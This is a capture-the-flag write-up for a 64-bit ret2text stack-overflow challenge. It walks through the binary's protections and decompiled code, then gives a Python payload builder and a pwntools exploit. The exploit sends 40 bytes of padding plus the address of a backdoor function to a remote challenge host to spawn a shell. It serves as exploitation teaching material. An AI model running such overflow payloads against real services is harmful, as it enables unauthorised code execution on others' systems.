Problem: [SWPUCTF 2022 新生赛]有手就行的栈溢出 (SWPUCTF 2022 freshman round, "a stack overflow anyone can do")
Approach
- General idea of the solution
"""
[*] '/home/u22pwn/1_pwn_challs/ret2text/SWPUCTF2022新生赛_有手就行的栈溢出/pwn'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
SHSTK: Enabled
IBT: Enabled
Stripped: No
int __fastcall main(int argc, const char **argv, const char **envp)
{
init(argc, argv, envp);
puts(s);
overflow();
return 0;
}
__int64 overflow()
{
_BYTE v1[32]; // [rsp+0h] [rbp-20h] BYREF
gets(v1);
return 0;
}
int fun()
{
char *argv[2]; // [rsp+0h] [rbp-10h] BYREF
argv[0] = "/bin/sh";
argv[1] = 0;
return execve("/bin/sh", argv, 0);
}
"""
The binary contains a backdoor function fun that runs execve("/bin/sh"), so the stack overflow only has to redirect control flow there. overflow() reads with gets() into v1, a 32-byte buffer at rbp-0x20, with no length check: the first 32 bytes fill the buffer, the next 8 overwrite the saved rbp, and bytes 40..47 land on the saved return address of overflow(), which is popped by its ret. Because the binary is No PIE, fun has a fixed address, and because it is not stripped the address can be read straight from the symbol table. No canary means the overwrite goes undetected, and NX is irrelevant since no injected code is executed, only existing code in .text (ret2text). The "SHSTK: Enabled" and "IBT: Enabled" lines only mean the binary was built with -fcf-protection; they are enforced only when the CPU, kernel and libc all support and enable CET, and the exploit does not have to account for them here. One check worth doing when building the payload: gets() stops at the first 0x0a byte, so the packed address must not contain a newline (NUL bytes are fine, gets() copies them).
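As an added example that is not part of the original writeup, the following stand-alone Python builds the same payload layout without pwntools: it turns the decompiler's `[rbp-20h]` annotation into the 40-byte padding, appends the target address as 8 little-endian bytes, optionally inserts a lone `ret` gadget for 16-byte stack realignment, and refuses any payload that contains 0x0a because gets() would stop reading there. FUN_ADDR_EXAMPLE and RET_GADGET_EXAMPLE are hypothetical placeholder addresses, not values taken from this binary.

```python
import re
import struct

# Taken from the decompiler line shown on this page:
#   _BYTE v1[32]; // [rsp+0h] [rbp-20h] BYREF
V1_ANNOTATION = "[rbp-20h]"

# Hypothetical addresses for illustration only: the real ones come from
# ELF('./pwn').sym['fun'] and from a gadget search in the binary.
FUN_ADDR_EXAMPLE = 0x4011D6
RET_GADGET_EXAMPLE = 0x40101A


def parse_rbp_offset(annotation):
    """Distance in bytes from rbp down to the start of the buffer.

    IDA writes hex with a trailing 'h': '[rbp-20h]' -> 0x20.
    """
    m = re.search(r"\[rbp-([0-9A-Fa-f]+)h?\]", annotation)
    if m is None:
        raise ValueError("unrecognised stack annotation: %r" % (annotation,))
    return int(m.group(1), 16)


def padding_to_return_address(rbp_offset, saved_rbp_size=8):
    """Bytes between the buffer start and the saved return address on amd64.

    Frame layout, low to high address:
        [buffer ...][saved rbp (8)][return address (8)]
    so the return address sits rbp_offset + 8 bytes past the buffer start.
    """
    return rbp_offset + saved_rbp_size


def p64(value):
    """Little-endian 8-byte packing, the same thing pwntools p64 does for amd64."""
    if not 0 <= value < 2 ** 64:
        raise ValueError("address does not fit in 64 bits")
    return struct.pack("<Q", value)


def check_gets_safe(payload):
    """gets() stops at the first newline, so a 0x0a anywhere truncates the payload.

    NUL bytes are fine: gets() copies them and only the newline ends the read.
    """
    idx = payload.find(b"\n")
    if idx != -1:
        raise ValueError("payload has 0x0a at offset %d; gets() would stop there" % idx)


def build_ret2text_payload(annotation, target, ret_gadget=None, filler=b"A"):
    """padding + [ret gadget] + target address, checked for bytes gets() cannot deliver.

    ret_gadget is optional: a lone `ret` realigns rsp to 16 bytes before the
    target runs, which only matters if the target faults on an aligned SSE store.
    """
    pad_len = padding_to_return_address(parse_rbp_offset(annotation))
    chain = b""
    if ret_gadget is not None:
        chain += p64(ret_gadget)
    chain += p64(target)
    payload = filler * pad_len + chain
    check_gets_safe(payload)
    return payload


def frame_layout(payload, annotation):
    """Split a payload into the stack slots it overwrites, as a sanity check."""
    buf_len = parse_rbp_offset(annotation)
    return {
        "buffer": payload[:buf_len],
        "saved_rbp": payload[buf_len:buf_len + 8],
        "return_address": payload[buf_len + 8:buf_len + 16],
        "rest": payload[buf_len + 16:],
    }


if __name__ == "__main__":
    pl = build_ret2text_payload(V1_ANNOTATION, FUN_ADDR_EXAMPLE)
    for slot, data in frame_layout(pl, V1_ANNOTATION).items():
        print("%-15s %s" % (slot, data.hex()))
```

In the real exploit the target is elf.sym['fun'] read from the unstripped binary, as the EXP section does; the newline check is the part people forget, since an address such as 0x40120a packs to a byte string that begins with 0x0a and would be cut off by gets() before the return address is fully overwritten.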
EXP
- Exploit code
"""
from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'          # makes flat()/p64() pack 8-byte little-endian words

# io = process("./pwn")
io = remote("node5.anna.nssctf.cn", 28171)

# ret2text64
# payload: padding, fun
# v1 is 32 bytes at rbp-0x20, plus 8 bytes of saved rbp -> 40 bytes to the return address
elf = ELF('./pwn')
fun_addr = elf.sym['fun']       # not stripped and No PIE: fixed address from the symbol table
pl = flat(b'A'*40, fun_addr)
# if fun faults on an aligned SSE store (movaps) instead of spawning a shell,
# put a single `ret` gadget in front of fun_addr to realign rsp
io.sendlineafter(b'Do you know how stack overflows', pl)   # prompt printed by puts(s) in main
io.interactive()
"""
Summary
- What this challenge tests
RET2TEXT64: on a 64-bit No-PIE binary with no stack canary, overflow the stack buffer (32 bytes of buffer + 8 bytes of saved rbp = 40 bytes of padding) to overwrite the saved return address with the address of a function that already exists in .text, here the backdoor fun that calls execve("/bin/sh"). NX is not an obstacle because no injected code runs, and the address is fixed because PIE is disabled.
